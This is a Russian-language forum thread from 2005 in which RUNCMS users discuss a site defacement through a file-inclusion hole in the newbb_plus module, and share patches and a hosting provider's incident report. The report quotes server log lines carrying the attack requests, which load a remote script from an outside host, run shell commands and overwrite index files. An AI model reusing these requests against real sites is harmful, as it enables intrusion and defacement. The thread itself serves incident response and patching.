|
Правила •
Регистрация •
Справка Сообщения за день • Поиск |
|
|
|
Опции темы | Опции просмотра |
Далекая Радуга
|
Сделайте, плиз, и для newbb plus 0.70
Много форумов стоит, в каждом файле не наисправляешься. Для девочек |
||||
|
|
Старший участник
|
Прислал мой хостер.
Вот вам часть репорта дежурного администратора: Вот как был закачан index.html ================== 201.17.185.104 - - [17/Sep/2005:03:28:15 +0400] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.megahostbr.com/a1ts/cse.gif?&cmd=id HTTP/1.1" 200 2561 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 201.17.185.104 - - [17/Sep/2005:03:30:24 +0400] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.megahostbr.com/a1ts/cse.gif?&dx=1&hostxpl=http://216.111.31.2/index2.html&storage=/home/b155/public_html/e-xoopport/index.html HTTP/1.1" 200 2287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 201.17.185.104 - - [17/Sep/2005:03:30:28 +0400] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.megahostbr.com/a1ts/cse.gif?&dx=1&hostxpl=http://216.111.31.2/index2.html&storage=/home/b155/public_html/e-xoopport/index.php HTTP/1.1" 200 2287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 201.17.185.104 - - [17/Sep/2005:03:30:33 +0400] "GET / HTTP/1.1" 200 1068 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 201.17.185.104 - - [17/Sep/2005:03:31:43 +0400] "GET /favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 201.17.185.104 - - [17/Sep/2005:03:31:53 +0400] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.megahostbr.com/a1ts/cse.gif?&cmd=ls%20/home/b155/public_html HTTP/1.1" 200 3123 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 201.17.185.104 - - [17/Sep/2005:03:37:27 +0400] "GET / HTTP/1.1" 200 1068 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 201.17.185.104 - - [17/Sep/2005:08:43:14 +0400] "GET / HTTP/1.1" 304 - "http://www.zone-h.org/en/defacements" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" ================== IP адрес из Бразилии - анонимный прокси. Также ВОЗМОЖНО к злоумышленникам имеют отношение следующие IP адреса: ==================== 68.164.249.26 - - [17/Sep/2005:06:26:27 +0400]"GET / HTTP/1.1" 200 1068 "http://www.zone-h.org/en/defacements/view/id=2867260/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 85.232.96.245 - - [17/Sep/2005:14:50:45 +0400] "GET / HTTP/1.1" 302 133 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 85.232.96.245 - - [17/Sep/2005:14:50:46 +0400] "GET /modules/news/ HTTP/1.1" 200 8583 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 85.232.96.245 - - [17/Sep/2005:14:50:53 +0400] "GET / HTTP/1.1" 302 133 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 85.232.96.245 - - [17/Sep/2005:14:50:53 +0400] "GET /themes/ex-dr/date-russian.js HTTP/1.1" 304 - "http://www.e-xoopport.ru/modules/news/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" ==================== Ip заблокированы, все запросы где есть строка "bbPath[path]=" тоже заблокированы. Злоумышленникам запустить эксплоит запустить не удалось. уязвимость в /modules/newbb_plus/class/forumpollrenderer.php при запросе /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=xxxxx файл forumpollrenderer.php переименован. Будьте внимательны и примите меры к устранению уязвимости! Nosce te iptium // Познай самого себя |
||||
|
|
Нерешительный
|
блин, чего людям спокойно не живется...
|
||||
|
|
[исход]
|
Цитата:
Цитата:
Цитата:
Цитата:
if (!defined('XOOPS_ROOT_PATH')) { exit(); } Ну а у тех, у кого Newbb Plus 0.81 или 0.82 ставить выложенные заплатки Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском ------------------------------------------------------------------- Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки. |
||||
|
|
Нерешительный
|
такой вопрос, а Бывший стандартный форум E-Xoops/RUNCMS с версии 1.1 NewBB для RUNCMS ver 1.02 дырявая или уже проверенна временем?
|
||||
|
|
Старший участник
|
LARK*Да знаю, это хостер написал, и переименовал сам, даже после того как я заплатку поставил.
Справедливо наверно для всех newbb_plus, у порта так 0.70... Искал, вроеде не нашел, по логам хостера вроде бы был только залит index.html Nosce te iptium // Познай самого себя |
||||
|
|
[исход]
|
Цитата:
Цитата:
Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском ------------------------------------------------------------------- Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки. |
||||
|
|
Участник
|
Цитата:
в логах осталось [Sat Sep 17 00:09:51 2005] [error] PHP Fatal error: Call to undefined function: posix_getuid() in http://www.megahostbr.com/a1ts/cse.g...uage//main.php on line 12 следов взлома не заметил, но вот нашел странный файл с chmod 600 в tmp/phpCnDTHi (но создан был 15.09) изменить chmod и удалить его не получается Последний раз редактировалось Vinni, 09-17-2005 в 18:11 |
||||
|
|
Старший участник
|
А вот это вы видали!!! Пачками!!!
http://www.zone-h.org/defacements/fi...r_defacer=A1TS Сколько уже русских сайтов задифейсили! Что за сайт не пойму, таких надо по почкам! Фтыкать всем! Они разошлись, кроме подмены есть и полный подмен (я попал на подмен только главной), даже по русски http://www.zone-h.org/ru/defacements...r=A1TS/page=1/ ПиОнеРы рядом!!! Русские сайты дифейсят! Последний раз редактировалось DR, 09-17-2005 в 19:09 Nosce te iptium // Познай самого себя |
||||
|
|
|
|
|
Powered by: vBulletin Version 3.0 Copyright ©2000-2024, Jelsoft Enterprises Ltd. |
Все разделы прочитаны - Руководство форума - Архив - Вверх |